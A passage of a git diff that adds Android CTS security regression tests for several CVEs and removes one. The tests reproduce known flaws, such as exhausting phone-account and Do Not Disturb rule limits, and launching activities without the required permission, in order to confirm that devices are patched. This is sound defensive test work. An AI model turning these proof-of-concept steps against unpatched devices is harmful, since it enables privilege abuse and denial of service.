+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_39738 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 216190509)
+ @Test
+ public void testPocCVE_2021_39738() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // BluetoothPairingDialog activity should require BLUETOOTH_PRIVILEGED permission
+ final String pkgName = "com.android.car.settings";
+ ComponentName component =
+ new ComponentName(pkgName, pkgName + ".bluetooth.BluetoothPairingDialog");
+ String permission = pm.getActivityInfo(component, 0 /* flags */).permission;
+ assertTrue(
+ "Vulnerable to b/216190509",
+ permission.contains(android.Manifest.permission.BLUETOOTH_PRIVILEGED));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
new file mode 100644
index 0000000..45cc049
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
@@ -0,0 +1,120 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20129;
+
+import static android.Manifest.permission.MODIFY_PHONE_STATE;
+import static android.telecom.PhoneAccount.CAPABILITY_CALL_PROVIDER;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.PhoneAccount;
+import android.telecom.PhoneAccountHandle;
+import android.telecom.TelecomManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20129 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 217934478)
+ @Test
+ public void testPocCVE_2022_20129() {
+ // maxPhoneAccounts = 10 * MAX_PHONE_ACCOUNT_REGISTRATIONS to accommodate code customization
+ final int maxPhoneAccounts = 100;
+ boolean isVulnerable = false;
+ int phoneAccounts = 0;
+ ArrayList<PhoneAccountHandle> phoneAccountHandleList = new ArrayList<PhoneAccountHandle>();
+ Context context = null;
+ TelecomManager telecomManager = null;
+ UiAutomation uiAutomation = null;
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ context = instrumentation.getContext();
+ telecomManager = context.getSystemService(TelecomManager.class);
+ uiAutomation = instrumentation.getUiAutomation();
+
+ // Store the number of phoneaccounts present before test run
+ uiAutomation.adoptShellPermissionIdentity(MODIFY_PHONE_STATE);
+ phoneAccounts = telecomManager.getAllPhoneAccountHandles().size();
+
+ // Create and register 'maxPhoneAccounts' phoneAccounts
+ String packageName = context.getPackageName();
+ for (int i = 0; i < maxPhoneAccounts; ++i) {
+ PhoneAccountHandle handle =
+ new PhoneAccountHandle(
+ new ComponentName(packageName, PocService.class.getName()),
+ packageName + i);
+ PhoneAccount account =
+ new PhoneAccount.Builder(handle, packageName + i)
+ .setCapabilities(CAPABILITY_CALL_PROVIDER)
+ .addSupportedUriScheme(PhoneAccount.SCHEME_TEL)
+ .build();
+ phoneAccountHandleList.add(handle);
+ try {
+ telecomManager.registerPhoneAccount(account);
+ isVulnerable = true;
+
+ // Enable phoneAccount after registering so that it can be retrieved later using
+ // getAllPhoneAccountHandles, making the test reliable
+ telecomManager.enablePhoneAccount(
+ account.getAccountHandle(), true /* isEnabled */);
+ } catch (IllegalArgumentException expected) {
+ // This exception is expected with fix. Exception message isn't checked to
+ // accommodate code customizations
+ isVulnerable = false;
+ break;
+ }
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // Retrieve the total number of phoneAccounts added by test
+ phoneAccounts = telecomManager.getAllPhoneAccountHandles().size() - phoneAccounts;
+ boolean allAccountsAdded = maxPhoneAccounts == phoneAccounts;
+
+ // Unregister all phoneaccounts used in test
+ for (PhoneAccountHandle handle : phoneAccountHandleList) {
+ telecomManager.unregisterPhoneAccount(handle);
+ }
+ uiAutomation.dropShellPermissionIdentity();
+
+ // Test fails only if 'maxPhoneAccounts' phoneAccounts were added successfully in
+ // test and no exception occurred
+ assertFalse(
+ "Device is vulnerable to b/217934478!!", isVulnerable && allAccountsAdded);
+ } catch (Exception ignored) {
+ // Ignore exceptions here
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
similarity index 74%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
index 4416990..cd20396 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2022_20129;
-import android.app.Activity;
+import android.telecom.ConnectionService;
-public class PocActivity extends Activity {
+public class PocService extends ConnectionService {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java b/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
deleted file mode 100644
index 3c08cbb..0000000
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
+++ /dev/null
@@ -1,117 +0,0 @@
-/*
- * Copyright (C) 2022 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts.CVE_2022_20143;
-
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeTrue;
-
-import android.app.AutomaticZenRule;
-import android.app.Instrumentation;
-import android.app.NotificationManager;
-import android.app.UiAutomation;
-import android.content.ComponentName;
-import android.content.Context;
-import android.net.Uri;
-import android.platform.test.annotations.AsbSecurityTest;
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import java.util.ArrayList;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2022_20143 extends StsExtraBusinessLogicTestCase {
-
- @AsbSecurityTest(cveBugId = 220735360)
- @Test
- public void testPocCVE_2022_20143() {
- final int ruleLimitPerPackage = 200;
- final int timeoutDuration = 5000;
- final int waitDuration = 100;
- Instrumentation instrumentation;
- Context context;
- NotificationManager notificationManager = null;
- String packageName = null;
- UiAutomation uiautomation = null;
- boolean isVulnerable = true;
- boolean notificationPolicyAccessGranted = false;
- int automaticZenRules = 0;
- ArrayList<String> ruleIds = new ArrayList<>();
- try {
- instrumentation = InstrumentationRegistry.getInstrumentation();
- context = instrumentation.getContext();
- notificationManager = context.getSystemService(NotificationManager.class);
- packageName = context.getPackageName();
- uiautomation = instrumentation.getUiAutomation();
- uiautomation.executeShellCommand("cmd notification allow_dnd " + packageName);
- long startTime = System.currentTimeMillis();
- while (System.currentTimeMillis() - startTime < timeoutDuration) {
- // busy wait until notification policy access is granted
- if (notificationManager.isNotificationPolicyAccessGranted()) {
- notificationPolicyAccessGranted = true;
- break;
- }
- Thread.sleep(waitDuration);
- }
- // storing the number of automaticZenRules present before test run
- automaticZenRules = notificationManager.getAutomaticZenRules().size();
- ComponentName component =
- new ComponentName(packageName, PocActivity.class.getCanonicalName());
- for (int i = 0; i < ruleLimitPerPackage; ++i) {
- Uri conditionId = Uri.parse("condition://android/" + i);
- AutomaticZenRule rule = new AutomaticZenRule("ZenRuleName" + i, null, component,
- conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
- String id = notificationManager.addAutomaticZenRule(rule);
- ruleIds.add(id);
- }
- } catch (Exception e) {
- if (e instanceof IllegalArgumentException) {
- isVulnerable = false; // expected with fix
- } else {
- assumeNoException(e);
- }
- } finally {
- try {
- if (notificationPolicyAccessGranted) {
- /* retrieving the total number of automaticZenRules added by test so that the */
- /* test fails only if all automaticZenRules were added successfully */
- automaticZenRules =
- notificationManager.getAutomaticZenRules().size() - automaticZenRules;
- for (String id : ruleIds) {
- notificationManager.removeAutomaticZenRule(id);
- }
- uiautomation
- .executeShellCommand("cmd notification disallow_dnd " + packageName);
- }
- boolean allZenRulesAdded = ruleLimitPerPackage == automaticZenRules;
- assumeTrue("Notification policy access not granted",
- notificationPolicyAccessGranted);
- assertFalse(
- "Vulnerable to b/220735360!! System can be corrupted by adding many"
- + " AutomaticZenRules via NotificationManager#addAutomaticZenRule",
- isVulnerable && allZenRulesAdded);
- } catch (Exception e) {
- assumeNoException(e);
- }
- }
- }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20234.java b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
new file mode 100644
index 0000000..8d65cdb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20234.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20234 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 225189301)
+ @Test
+ public void testPocCVE_2022_20234() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assume().withMessage("Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing")
+ .that(pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE))
+ .isTrue();
+
+ // With fix, NotificationAccessConfirmationActivity is not exported
+ final String activityName = ".notifications.NotificationAccessConfirmationActivity";
+ final String pkgName = "com.android.car.settings";
+ ComponentName component = new ComponentName(pkgName, pkgName + activityName);
+ boolean exported = pm.getActivityInfo(component, 0 /* flags */).exported;
+ assertWithMessage(
+ "Vulnerable to b/225189301!! "
+ + pkgName
+ + activityName
+ + "can be started from outside system process")
+ .that(exported)
+ .isFalse();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
new file mode 100644
index 0000000..7c3b7de
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/CVE_2022_20429.java
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothDevicePicker;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20429 extends StsExtraBusinessLogicTestCase {
+ private BroadcastReceiver mBroadcastReceiver;
+ private Context mContext;
+ private Semaphore mBroadcastReceived;
+ private String mErrorMessage;
+ private UiAutomation mUiAutomation;
+ private boolean mBtState;
+ private int mStatusCode;
+
+ @AsbSecurityTest(cveBugId = 220741473)
+ @Test
+ public void testPocCVE_2022_20429() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mContext = instrumentation.getContext();
+ PackageManager pm = mContext.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ mContext.getString(
+ R.string.cve_2022_20429_featureMissing,
+ PackageManager.FEATURE_AUTOMOTIVE),
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // Skip test if bluetooth feature not available
+ assumeTrue(
+ mContext.getString(
+ R.string.cve_2022_20429_featureMissing,
+ PackageManager.FEATURE_BLUETOOTH),
+ pm.hasSystemFeature(PackageManager.FEATURE_BLUETOOTH));
+ mBroadcastReceived = new Semaphore(0);
+ mBtState = false;
+ mErrorMessage = "";
+ mStatusCode = getInteger(R.integer.cve_2022_20429_failure);
+ mUiAutomation = instrumentation.getUiAutomation();
+ mUiAutomation.adoptShellPermissionIdentity();
+
+ // Register BroadcastReceiver to receive status from PocActivity
+ mBroadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context mContext, Intent intent) {
+ try {
+ if (intent.getAction()
+ .equals(
+ mContext.getString(
+ R.string.cve_2022_20429_broadcastAction))) {
+ mStatusCode =
+ intent.getIntExtra(
+ mContext.getString(
+ R.string.cve_2022_20429_resultKey),
+ getInteger(R.integer.cve_2022_20429_failure));
+ mErrorMessage =
+ intent.getStringExtra(
+ mContext.getString(
+ R.string.cve_2022_20429_messageKey));
+ mBroadcastReceived.release();
+ } else if (intent.getAction()
+ .equals(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED)
+ && intent.getIntExtra(
+ BluetoothAdapter.EXTRA_SCAN_MODE,
+ BluetoothAdapter.ERROR)
+ == BluetoothAdapter
+ .SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+ mBroadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // Ignore exceptions here
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter();
+ filter.addAction(mContext.getString(R.string.cve_2022_20429_broadcastAction));
+ filter.addAction(BluetoothAdapter.ACTION_SCAN_MODE_CHANGED);
+ mContext.registerReceiver(mBroadcastReceiver, filter);
+ BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
+
+ // Save the state of bluetooth adapter to reset after the test
+ mBtState = btAdapter.isEnabled();
+
+ // Disable bluetooth if already enabled in 'SCAN_MODE_CONNECTABLE_DISCOVERABLE' mode
+ if (btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ }
+
+ // Enable bluetooth if in disabled state
+ if (!btAdapter.isEnabled()) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_ENABLE);
+ }
+ mContext.startActivity(
+ new Intent(BluetoothDevicePicker.ACTION_LAUNCH)
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ mBroadcastReceived.tryAcquire(
+ getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS);
+
+ // Test fails if Bluetooth Scan mode changes to SCAN_MODE_CONNECTABLE_DISCOVERABLE
+ assertFalse(
+ mContext.getString(R.string.cve_2022_20429_failMsg),
+ btAdapter.getScanMode() == BluetoothAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // Disable bluetooth if it was OFF before the test
+ if (!mBtState) {
+ switchBluetoothMode(BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ }
+ mUiAutomation.dropShellPermissionIdentity();
+ } catch (Exception e) {
+ // Ignore exceptions here
+ }
+ }
+ }
+
+ int getInteger(int resId) {
+ return mContext.getResources().getInteger(resId);
+ }
+
+ private void switchBluetoothMode(String action) throws Exception {
+ // Start PocActivity to switch bluetooth mode
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(mContext.getString(R.string.cve_2022_20429_btAction), action);
+ mContext.startActivity(intent);
+
+ // Wait until bluetooth mode switch is completed successfully
+ assumeTrue(
+ mBroadcastReceived.tryAcquire(
+ getInteger(R.integer.cve_2022_20429_timeoutMs), TimeUnit.MILLISECONDS));
+ assumeTrue(mErrorMessage, mStatusCode != getInteger(R.integer.cve_2022_20429_failure));
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
new file mode 100644
index 0000000..7883455
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20429/PocActivity.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothManager;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import java.util.regex.Pattern;
+
+public class PocActivity extends Activity {
+
+ int getInteger(int resId) {
+ return getResources().getInteger(resId);
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ try {
+ String action = getIntent().getStringExtra(getString(R.string.cve_2022_20429_btAction));
+ int code = getInteger(R.integer.cve_2022_20429_enable);
+ if (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)) {
+ code = getInteger(R.integer.cve_2022_20429_disable);
+ }
+ BluetoothManager bluetoothManager = getSystemService(BluetoothManager.class);
+ BluetoothAdapter bluetoothAdapter = bluetoothManager.getAdapter();
+ if ((action.equals(BluetoothAdapter.ACTION_REQUEST_ENABLE)
+ && !bluetoothAdapter.isEnabled())
+ || (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)
+ && bluetoothAdapter.isEnabled())) {
+ Intent btIntent = new Intent(action);
+ startActivityForResult(btIntent, code);
+
+ // Wait for the 'Allow' button
+ String settingsPackageName =
+ getString(R.string.cve_2022_20429_carSettingsPackageName);
+ Resources settingsRes =
+ getPackageManager().getResourcesForApplication(settingsPackageName);
+ int resIdentifier =
+ settingsRes.getIdentifier(
+ getString(R.string.cve_2022_20429_allowButtonResKey),
+ getString(R.string.cve_2022_20429_resType),
+ settingsPackageName);
+ String allowButtonText = settingsRes.getString(resIdentifier);
+ Pattern textPattern = Pattern.compile(allowButtonText, Pattern.CASE_INSENSITIVE);
+ BySelector selector = By.text(textPattern);
+ UiDevice uiDevice = UiDevice.getInstance(getInstrumentation());
+ uiDevice.wait(
+ Until.hasObject(selector), getInteger(R.integer.cve_2022_20429_timeoutMs));
+
+ // Click on the 'Allow' button to enable bluetooth as required by test
+ UiObject2 uiObject = uiDevice.findObject(selector);
+ uiObject.click();
+ } else {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_success), "");
+ }
+ } catch (Exception e) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_failure), e.getMessage());
+ }
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ try {
+ if (requestCode == getInteger(R.integer.cve_2022_20429_enable)
+ && resultCode == Activity.RESULT_OK) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_enable), "");
+ } else if (requestCode == getInteger(R.integer.cve_2022_20429_disable)
+ && resultCode == Activity.RESULT_OK) {
+ sendTestResult(getInteger(R.integer.cve_2022_20429_disable), "");
+ }
+ } catch (Exception e) {
+ // Ignore exception here
+ }
+ }
+
+ void sendTestResult(int result, String message) {
+ try {
+ Intent intent = new Intent(getString(R.string.cve_2022_20429_broadcastAction));
+ intent.putExtra(getString(R.string.cve_2022_20429_resultKey), result);
+ intent.putExtra(getString(R.string.cve_2022_20429_messageKey), message);
+ sendBroadcast(intent);
+ finish();
+ } catch (Exception e) {
+ // Ignore exception here
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
new file mode 100644
index 0000000..6536e8a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.PendingIntent;
+import android.content.BroadcastReceiver;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.LauncherApps;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+import android.os.Process;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Method;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20916 extends StsExtraBusinessLogicTestCase {
+ private static final long TIMEOUT_MS = 10_000L;
+
+ // b/229256049
+ // Vulnerable library : services.jar, framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 229256049)
+ @Test
+ public void testPocCVE_2023_20916() {
+ try {
+ // Ensure that the test app does not have the ACCESS_SHORTCUTS permission
+ Context context = getApplicationContext();
+ assumeFalse("The test requires the app to not have the ACCESS_SHORTCUTS permission",
+ context.checkPermission(android.Manifest.permission.ACCESS_SHORTCUTS,
+ Process.myPid(), Process.myUid()) == PackageManager.PERMISSION_GRANTED);
+
+ // Make a call to the vulnerable function getMainActivityLaunchIntent()
+ Method method = LauncherApps.class.getMethod("getMainActivityLaunchIntent",
+ ComponentName.class, Bundle.class, UserHandle.class);
+ PendingIntent pi =
+ (PendingIntent) method.invoke(context.getSystemService(LauncherApps.class),
+ new ComponentName(context, PocActivity.class), null,
+ UserHandle.getUserHandleForUid(Process.myUid()));
+
+ // Register a broadcast receiver to receive broadcast from PocActivity indicating
+ // presence of vulnerability
+ final Semaphore broadcastReceived = new Semaphore(0);
+ final String bcastAction = "CVE_2023_20916_action";
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction().equals(bcastAction)) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter(bcastAction);
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Attempt to launch the PocActivity using the pending intent received by calling
+ // getMainActivityLaunchIntent()
+ context.startIntentSender(pi.getIntentSender(), null, 0, 0, 0, null);
+
+ // On vulnerable device, PocActivity is successfully launched using
+ // LauncherAppsService#getActivityLaunchIntent and sends a broadcast, if it is received
+ // successfully, the test fails.
+ assertFalse("Device is vulnerable to b/229256049 !!",
+ broadcastReceived.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ try {
+ if (e.getCause() instanceof SecurityException && e.getCause().getMessage()
+ .contains("Caller can't access shortcut information")) {
+ // this exception is thrown with fix so ignoring it
+ return;
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
new file mode 100644
index 0000000..4953c20
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+
+ // PocActivity has been launched successfully, this indicates presence of vulnerability
+ // so broadcasting it to DeviceTest.
+ sendBroadcast(new Intent("CVE_2023_20916_action"));
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20927.java b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
new file mode 100644
index 0000000..8b9f494
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
